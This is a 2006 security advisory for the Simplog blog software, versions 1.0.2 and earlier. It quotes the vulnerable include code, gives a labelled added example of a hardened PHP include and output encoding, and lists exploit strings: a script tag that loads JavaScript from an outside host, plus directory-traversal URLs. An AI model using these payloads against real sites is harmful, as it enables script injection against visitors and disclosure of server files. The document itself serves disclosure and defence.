SECURITYVULNS:DOC:11703
Mar 05, 2006

Simplog <= 1.0.2 Vulnerabilities

ORIGINAL SOURCE: http://notlegal.ws/simplogsploit.txt

-------- summary
software: simplog
vendors website: http://daverave.64digits.com/home.php?page=simplog
versions: <= 1.0.2
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard and jim
risk level: medium

-------- description
simplog does not sanitise blog posts, allowing users to insert
html into posts, which causes an xss vulnerability. also, the application
uses global variables for includes, allowing users to include
.txt files other than the intended target

in index.php (lines 42-50):

    $act = $_GET['act'];        // taken straight from the query string
    if ($act == '')
    {
        include("blog.txt");
    }
    else
    {
        // $act is not validated, so "../" sequences change the included path
        include("act/$act.txt");
    }
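
A hardened form of the include above, together with output encoding for post bodies, as an added example that is not part of the original advisory or of Simplog. The function names resolve_act_file and render_post_body, the demo directory layout and the sample inputs are assumptions; the empty-act branch that includes blog.txt would stay as it is.

```php
<?php
// Added example, not Simplog code. Names and demo layout are assumptions.

/** Map the 'act' value to a file inside $actDir, or null if rejected. */
function resolve_act_file(string $act, string $actDir): ?string
{
    // Plain names only: no dots, slashes, NUL bytes or stream wrappers.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $act)) {
        return null;
    }
    $base = realpath($actDir);
    $path = realpath($actDir . '/' . $act . '.txt');
    // realpath() is false for missing files and resolves symlinks, so the
    // prefix check rejects anything that ends up outside act/.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/** Encode a stored post body so markup in it is displayed, not executed. */
function render_post_body(string $raw): string
{
    return nl2br(htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}

// Constructed demo: a temporary act/ directory with one page and a file
// one level above it standing in for "somefile".
$root = sys_get_temp_dir() . '/simplog_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/act', 0700, true);
file_put_contents($root . '/act/blog.txt', 'blog page');
file_put_contents($root . '/somefile.txt', 'not meant to be served');

foreach (['blog', '../somefile', 'blog/../../somefile', 'missing'] as $act) {
    $file = resolve_act_file($act, $root . '/act');
    $result = $file === null ? 'rejected' : 'served ' . basename($file);
    printf("%-24s => %s\n", var_export($act, true), $result);
}
echo render_post_body('<SCRIPT SRC=http://example.invalid/xss.js></SCRIPT>'), "\n";

// Remove the demo files again.
unlink("$root/act/blog.txt");
unlink("$root/somefile.txt");
rmdir("$root/act");
rmdir($root);
```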

-------- exploit(s)
xss:
make any of your blog posts contain a script like below
<SCRIPT SRC=http://notlegal.ws/xss.js></SCRIPT>

directory traversal:
http://example.com/index.php?act=blog&blogid=../somefile
http://example.com/index.php?act=../somefile

-------- credit
author(s): retard and jim
email: [email protected]